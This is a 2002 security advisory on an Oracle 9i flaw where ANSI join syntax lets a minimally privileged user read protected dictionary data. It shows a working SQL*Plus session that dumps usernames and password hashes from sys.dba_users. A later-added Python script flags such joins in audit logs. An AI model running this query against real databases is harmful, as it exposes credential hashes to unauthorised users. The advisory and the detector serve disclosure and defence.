Pentest Security Advisory : PTL-2002-02
Vulnerability with Oracle ANSI join syntax

Advisory Details

Author: Pete Finnigan
Date: 2nd May 2002
Reference: ptl-2002-02

Overview:

This advisory describes an issue with the ANSI join syntax in Oracle 9i. Oracle still supports the old join syntax, but the ANSI syntax has a serious security issue that allows any user to view any data.

Description:

Here is an example:

SQL*Plus: Release 9.0.1.0.1 - Production on Tue Apr 16 15:16:45 2

(c) Copyright 2001 Oracle Corporation.  All rights reserved.


Connected to:
Oracle9i Enterprise Edition Release 9.0.1.1.1 - Production
With the Partitioning option
JServer Release 9.0.1.1.1 - Production

SQL> connect / as sysdba
Connected.
SQL> CREATE USER us1 IDENTIFIED BY us11;

User created.

SQL> Grant Create Session to us1;

Grant succeeded.

SQL> connect us1/us11;
Connected.
SQL> select a.username, a.password
  2  from sys.dba_users a left outer join sys.dba_users b on
  3  b.username = a.username
  4  ;

USERNAME                       PASSWORD
------------------------------ ------------------------------
SYS                            D4C5016086B2DC6A
SYSTEM                         D4DF7931AB130E37
...

...
RMAN                           E7B5D92911C831E1
QS_CB                          CF9CFACF5AE24964
QS_CS                          91A00922D8C0F146

30 rows selected.

SQL>

This shows that a user with the barest of privileges, i.e. CREATE SESSION, can see data in the data dictionary that should not be visible to that user. In this example we can select the list of usernames and their password hashes.
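One way to look for use of this issue in captured SQL text, as an added example that is not part of the original advisory: the script flags statements from non-privileged accounts that combine ANSI join keywords with SYS-owned or DBA_ dictionary objects. The audit records, the allow-list of privileged accounts and all function names are assumptions constructed for illustration.

```python
import re

# Constructed (user, SQL text) audit records; not taken from the advisory.
SAMPLE_AUDIT = [
    ("US1", "select a.username, a.password\n"
            "from sys.dba_users a left outer join sys.dba_users b on\n"
            "b.username = a.username"),
    ("US1", "SELECT e.name FROM app.emp e JOIN app.dept d ON d.id = e.dept_id"),
    ("SYSTEM", "select * from sys.dba_users a join sys.dba_roles r on 1 = 1"),
    ("US2", "select 'sys.dba_users join' from dual -- join sys.dba_users"),
    ("US2", "SELECT * FROM dba_users NATURAL JOIN dba_role_privs"),
    ("US3", "select username from sys.dba_users where username = 'X'"),
]

# Assumption: accounts that legitimately query the data dictionary.
PRIVILEGED = {"SYS", "SYSTEM"}

# String literals and comments are blanked first so keywords inside them
# do not trigger a match.
NOISE_RE = re.compile(r"'(?:[^']|'')*'|--[^\n]*|/\*.*?\*/", re.S)
# JOIN only appears as a keyword in ANSI join syntax; the old syntax uses commas.
JOIN_RE = re.compile(r"\bjoin\b", re.I)
# SYS-qualified objects, or DBA_ views reached through public synonyms.
DICT_RE = re.compile(r"\bsys\s*\.\s*[\w$#]+|\bdba_\w+", re.I)


def flag_ansi_dictionary_joins(records, privileged=PRIVILEGED):
    """Return (user, [dictionary objects]) for suspicious statements."""
    hits = []
    for user, sql in records:
        if user.upper() in privileged:
            continue
        text = NOISE_RE.sub(" ", sql)
        if not JOIN_RE.search(text):
            continue
        objs = sorted({re.sub(r"\s+", "", m.group(0)).upper()
                       for m in DICT_RE.finditer(text)})
        if objs:
            hits.append((user, objs))
    return hits


if __name__ == "__main__":
    for user, objs in flag_ansi_dictionary_joins(SAMPLE_AUDIT):
        print(f"{user}: ANSI join touching {', '.join(objs)}")
```

A hit is a lead to review against the account's actual grants, since the pattern match does not know what the user is entitled to read.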

Test Environment:

These vulnerabilities have been tested on Oracle 9i version 9.0.1.x installed on Sun Solaris 2.8. All other platforms are vulnerable.

Recommendations:

Apply vendor patches.

Vendor Status:

The vendor has issued a bulletin and made patches available on this issue. See
http://otn.oracle.com/deploy/security/pdf/sql_joins_alert.pdf

